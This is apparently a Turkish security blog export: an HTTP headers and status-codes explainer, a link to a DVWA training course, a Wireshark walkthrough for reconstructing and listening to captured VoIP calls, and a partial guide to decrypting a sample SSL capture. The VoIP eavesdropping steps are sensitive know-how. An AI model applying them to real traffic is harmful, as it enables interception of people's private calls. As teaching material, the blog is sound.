<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">WWW-Authenticate: </strong>Sunucun desteklediği kimlik doğrulama türlerini gösterir.(401 code)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-Frame-Options: </strong>Desteklenebilir pencere ayarını gösterir.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">COOKIE Başlıkları</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Çerezler</strong>, istemci ile sunucu arasında etkileşimi daha güvenli hale getirmek için kullanılan yapılardır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">expires:</strong>Bir çerezin son kullanma süresini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">domain:</strong>Çerezin kullanılacağı etki alanını gösterir.(fbh.com.tr)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path: </strong>Çerezlerin adresini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">secure: </strong>Bu seçenek kullanılırsa çerezler sadece https bağlantılarında kullanılacaktır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HttpOnly: </strong>Bu özellik aktif edilirse istemci tarafında javascript kodu ile çereze ulaşımı engellenir.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Durum Kodları(Status Codes)</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">İstemci sunucu arasındaki etkileşim sonucunda dönen cevap durumlarını bazı sabitlenmiş kodlar ile anlamlandırılmıştır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1xx:</strong> Bilgilendirme mesajlarını gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2xx:</strong> İsteğin başarılı olduğunu gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">3xx:</strong> İsteğin başka sayfaya yönlendirileceğini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">4xx:</strong> İstemci bazlı hataları gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">5xx:</strong> Sunucu bazlı hataları gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Bazı Sayfaların Anlamları</strong></span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">200:</strong> İsteğin başarılı olduğunu ve isteğin body kısmının gönderileceğini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">301:</strong> İstenilen sayfanın kalıcı olarak taşındığını-silindiğini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">302:</strong> İstenilen sayfanın geçici olarak ulaşılamadığını gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">304:</strong> Geçici oalrak ulaşılamayan sayfaya önbellekten ulaşılabileceğini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">400:</strong> Yanlış yapılandırılmış bir URL isteğini gösterir.(URL içinde boşluk olması)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">401: </strong>HTTP kimlik doğrulamasının olacağını gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">403:</strong> Yetkisiz olan istekler için gösterilemeyecek sayfa olduğunu gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">405:</strong> Belirtilen URL için kullanılamaz olduğunu gösterir. PUT metotunu desteklemeyen bir sayfaya istek yaptığımızda bu cevap gelir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">413: </strong>İstenilen sayfanın body kısmının çok büyük olmasından dolayı sunucun cevap verememesi durumunda oluşur.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">414: </strong>İstenilen sayfanın URL değerinin çok uzun olmasından dolayı sunucunun cevap verememesi durumundan kaynaklanır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">500:</strong> Beklenmedik bir hatadan dolayı sunucu tarafından verilen cevaptır.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTPS</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">HTTP protokolü TCP protokol yapısını kullanarak veri iletimi gerçekleştirir ve bu iletim araya giren saldırganlar tarafından görünmek istenirse kolayca görüntülenir.HTTPs ile veriler SSL protokol yapısı kullanılarak şifrelenerek iletimi gerçekleştirilir. Verinin bütünlüğü ve gizliliği korunur.Araya giren saldırganlar trafiği görebilir ancak anlamlandıramaz.HTTPs ile HTTP nin çalışma mantıkları güvenli protokol desteği hariç aynıdır.</span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-67266863171064272962014-11-12T10:18:00.000+02:002014-11-12T10:18:41.319+02:0010 Derste DVWA ile Web Uygulama Zafiyet Tespit EğitimiArkadaşlar, 10 derste <b>DVWA </b>uygulamasının <b>low </b>seviyesindeki açıklıklarını anlatmaya çalıştım.<br />
<br />
Yararlı olması dileğiyle....<br />
<br />
<a href="http://blog.fbh.com.tr/category/dvwa-egitimi/" target="_blank">Buradan ulaşabilirsiniz.</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSJ6bpIhiW05hQmET7_lse-cHMNsJJ3ZMXERZI1cJCtJvvyFxCde9OIiBd5U1XSs9MjW1n9iYc81hJZztDcxoIxEHHBP9JKw5MAjqkCZAHVbMD-o0L2_lZMoclaep_tqzhvTM89AFEsw/s1600/dvwa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSJ6bpIhiW05hQmET7_lse-cHMNsJJ3ZMXERZI1cJCtJvvyFxCde9OIiBd5U1XSs9MjW1n9iYc81hJZztDcxoIxEHHBP9JKw5MAjqkCZAHVbMD-o0L2_lZMoclaep_tqzhvTM89AFEsw/s400/dvwa.png" width="400" /></a></div>
<br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-33174184024205520492014-11-05T14:36:00.001+02:002015-01-20T22:23:40.818+02:00Wireshark ile VOIP tabanlı telefonları dinleme<b>RTP(Real Time Protocol)</b>, gerçek zamanlı uygulamalarda kullanılan bir protokoldür. VOIP ile ses aktarımı gibi işlemlerde kullanılır. Şirket içerisinde kullandığımız telefonları VOIP aracılığıyla kullandığmızda internet hatları üzerinden iletişim sağlarız.Peki bu telefon görüşmesi trafiği sniff edilirse bu yakalanan paketleri anlamlı hale getirebilir miyiz?<br />
<br />
Yakalan bu paketleri wireshark ile anlamlı hale getirebiliriz. Hatta telefon görüşmesini dinleyebiliriz.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMeeprL5kT-Bbbe7mbsLQkrlLxQ1z0hkYY9CP50pFnNOo14faePJW3PvrobMS6jxJyhYTvbDeL9nlavVN4LYGtifyiaW1PpL3wjJaHhLusN8vY6wnV9bJH068hdYxr7rTJI9d1dcZzYQ/s1600/w1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMeeprL5kT-Bbbe7mbsLQkrlLxQ1z0hkYY9CP50pFnNOo14faePJW3PvrobMS6jxJyhYTvbDeL9nlavVN4LYGtifyiaW1PpL3wjJaHhLusN8vY6wnV9bJH068hdYxr7rTJI9d1dcZzYQ/s1600/w1.PNG" height="175" width="400" /></a></div>
<br />
<a name='more'></a><br />
Yukarıda kayıt altına aldığımız trafik var. Tüm RTP paketlerini birleştirelim.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoD2Ht4IhBVVEM9330fRVC4bzNSb7MPaCUugOm7Dl0fujpWmP-GWUdeAKI_4ThX8NxM4CWCs4gEQxRam6z0SWZIU8G4qFU2RyO-2cPkR3BfEskjodGRaRMVl9HQPPi-j171oHkhnfVY54/s1600/w2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoD2Ht4IhBVVEM9330fRVC4bzNSb7MPaCUugOm7Dl0fujpWmP-GWUdeAKI_4ThX8NxM4CWCs4gEQxRam6z0SWZIU8G4qFU2RyO-2cPkR3BfEskjodGRaRMVl9HQPPi-j171oHkhnfVY54/s1600/w2.png" height="225" width="400" /></a></div>
<br />
Aşağıda birleştirilen bağlantılardan birini seçiyoruz ve Analyze ediyoruz.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF6OLnUOVGMhDwGUxz81oFQGo1VPZLDADNP5XCUtTcFfXe75ET7za5MqcURovS0CwtozfjTMCeK-6_peYRCYk3AKomCT4wEyUpIVvXXgWYWxRrbA-ak8vvPjdZjbX6vlMNfkKPkV22F20/s1600/w3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF6OLnUOVGMhDwGUxz81oFQGo1VPZLDADNP5XCUtTcFfXe75ET7za5MqcURovS0CwtozfjTMCeK-6_peYRCYk3AKomCT4wEyUpIVvXXgWYWxRrbA-ak8vvPjdZjbX6vlMNfkKPkV22F20/s1600/w3.PNG" height="223" width="400" /></a></div>
<br />
Paketleri dinleyelim.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_-6ZjqI5kWzKpYw7I4tpXDIpWlEncdQGi51ojoIMpvWZsGoodwewQgDnhW54jNedkzmpC1Jp3A1jPzXyB7KbhQWJDC-t6Ck1o-o8NK3a8a6MwzTbYMOK7EsNhruNij3enaAaDMHUJ0o/s1600/w4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_-6ZjqI5kWzKpYw7I4tpXDIpWlEncdQGi51ojoIMpvWZsGoodwewQgDnhW54jNedkzmpC1Jp3A1jPzXyB7KbhQWJDC-t6Ck1o-o8NK3a8a6MwzTbYMOK7EsNhruNij3enaAaDMHUJ0o/s1600/w4.PNG" height="286" width="400" /></a></div>
<br />
<br />
Karşımıza çıkan ekran aşağıdaki gibidir.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4OTJiEpPPTtbhqGGwQ2weEQ-3DsRcpw7kIC8aS8t29VpzQeHg_Wiu5kE7566AvXZ39mmzrFb-CSO0dzE-18VtgROb4GtCm_FXqbgzI3Dxk8TJKdVvU22vRFT5BKxc6IZf3KmbBs3MJo/s1600/w5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4OTJiEpPPTtbhqGGwQ2weEQ-3DsRcpw7kIC8aS8t29VpzQeHg_Wiu5kE7566AvXZ39mmzrFb-CSO0dzE-18VtgROb4GtCm_FXqbgzI3Dxk8TJKdVvU22vRFT5BKxc6IZf3KmbBs3MJo/s1600/w5.PNG" height="63" width="400" /></a></div>
<br />
Aşağıdaki alanları işaretleyelim ve dinlemeyi başlatalım.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXjRt761Bdp2ugeqEYGnblmfWCIbDrHuWs6Y8yIXsZqdaA154UNnTVJxOr3A7eH6xTkgO4vXiZuJvd52Kvc3GGriEq2EOGayeXCrOPuSSncpI6CCt7AnpKqcXdXV8anCnZcYn3qNuwIU/s1600/w6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXjRt761Bdp2ugeqEYGnblmfWCIbDrHuWs6Y8yIXsZqdaA154UNnTVJxOr3A7eH6xTkgO4vXiZuJvd52Kvc3GGriEq2EOGayeXCrOPuSSncpI6CCt7AnpKqcXdXV8anCnZcYn3qNuwIU/s1600/w6.PNG" height="142" width="400" /></a></div>
<br />
Kaydedilen veriyi sese çevirdi. Buradan şu sonuca varabiliriz. VOIP ile haberleşme trafiği yakalanabilirse görüşmeler dinlenebilir. Bu da VOIP işleminin şifrelenmeden gerçekleşmesinden kaynaklanıyor.<br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-4266077485813786102014-10-24T15:40:00.001+03:002015-01-20T22:23:40.823+02:00Wireshark ile SSL Trafiğini Çözme<span style="background-color: #eeeeee;">SSL protokolü ile şifreli bir şekilde gerçekleştirilen bir network trafiğini kayıt altına aldığımızda varolan ssl şifresi ile bu trafiği nasıl çözebildiğimizi bu makalede göstermeye çalışacağım.</span><br />
<span style="background-color: #eeeeee;"> Bu örneği;</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<span style="font-size: x-small;"><a href="http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=view&target=snakeoil2_070531.tgz" style="background-color: #eeeeee;" target="_blank">http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=view&target=snakeoil2_070531.tgz </a></span><br />
<span style="background-color: #eeeeee;"><br /></span>
<span style="background-color: #eeeeee;">adresinde daha detaylı bir şekilde bulablirsiniz.
Yukarıdaki adresten indirdiğimiz zipten çıkan dosyalarda ssl trafiği içeren <b>.pcap</b> dosyası,key'i barındıran dosya ve bu işlemin nasıl gerçekleştirildiğini anlatan dosya mevcuttur.
</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimABeSwh_NDoSXT1tle53arxPM4lXGolS3eOHc99RdXspmNP2dTrOtW8ijKWzbLEUg99_Z2MWE0YzFYAtxkyCR-pocOo8Kkms78KuHLMQC4s5FwgUPXb5FPq1VEIAJQXQGOWqkJCJtAm8/s1600/wi1.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimABeSwh_NDoSXT1tle53arxPM4lXGolS3eOHc99RdXspmNP2dTrOtW8ijKWzbLEUg99_Z2MWE0YzFYAtxkyCR-pocOo8Kkms78KuHLMQC4s5FwgUPXb5FPq1VEIAJQXQGOWqkJCJtAm8/s1600/wi1.PNG" height="47" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Trafiği içeren rsasnakeoil2.pcap dosyasını wireshark ile açalım.</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br /></span>
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br /></span>
<br />
<a name='more'></a><span style="background-color: #eeeeee;"><br /></span>
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wi1qOb6DoT_magsVMsekwEvVcfATq91A8mfuYHsUFDDYKcm_FKvsMBjb6Dr7wBLkEgv-ucdDlVY0A9X6PFEoYO3fT5kQkCGKPJYT9l4rba6b7busg-eCs0HAdBuUrjtM24Z8OgEoC84/s1600/wi2.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wi1qOb6DoT_magsVMsekwEvVcfATq91A8mfuYHsUFDDYKcm_FKvsMBjb6Dr7wBLkEgv-ucdDlVY0A9X6PFEoYO3fT5kQkCGKPJYT9l4rba6b7busg-eCs0HAdBuUrjtM24Z8OgEoC84/s1600/wi2.PNG" height="157" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Wireshark menülerinden ayarlar sekmesini açalım.</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6EhUHuUCIdZHD0jcdfneEaQxBPTPFWqbByFRB9kaEScQhHBPMmOUFrDKmnDWQgaMTQ8VVD6PhwrSGppINqGEPKTU7vhgOWWZshcu0uQfW-tFxRLVPdH9FBUJasUJqvSv7a5WoHLINAs/s1600/wi3.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6EhUHuUCIdZHD0jcdfneEaQxBPTPFWqbByFRB9kaEScQhHBPMmOUFrDKmnDWQgaMTQ8VVD6PhwrSGppINqGEPKTU7vhgOWWZshcu0uQfW-tFxRLVPdH9FBUJasUJqvSv7a5WoHLINAs/s1600/wi3.PNG" height="16" width="400" /></a></div>
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Bu sekmeyi tıkladıktan sonra karşımıza çıkan sayfadan soldaki menü alanından "Protocols" sekmesinin içinde SSL alanını tıklayın.</span></span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66PIAJCvuogRjAqHVrc3EXFsa9wnIFfzZPCXmlnJ4qja3AIe3FmHxRFcxfJ5Y_x85ofTVDgHrStkqUZR8-Y8yB_E7mTZgfKVm51c6S-___Nz4MxzMyRq7E8-fExvGG8muJC7wdHaT1Qg/s1600/wi4.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66PIAJCvuogRjAqHVrc3EXFsa9wnIFfzZPCXmlnJ4qja3AIe3FmHxRFcxfJ5Y_x85ofTVDgHrStkqUZR8-Y8yB_E7mTZgfKVm51c6S-___Nz4MxzMyRq7E8-fExvGG8muJC7wdHaT1Qg/s1600/wi4.PNG" height="132" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">"Edit" sekmesini tıklayalım.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpbC-147dqjBixRmo2BMOO33hwzLvHW19A1iSB4hPn-tZl_qqS_KYwMQi4TBrcUumkno_3m4PuXtYyNHwPFdWM3Y0AINVWq3cqv0mRQJBBlYx-sSX1Vqnq-rAJdc0oSU3LncS5Jzo55s/s1600/wi5.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpbC-147dqjBixRmo2BMOO33hwzLvHW19A1iSB4hPn-tZl_qqS_KYwMQi4TBrcUumkno_3m4PuXtYyNHwPFdWM3Y0AINVWq3cqv0mRQJBBlYx-sSX1Vqnq-rAJdc0oSU3LncS5Jzo55s/s1600/wi5.PNG" height="297" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
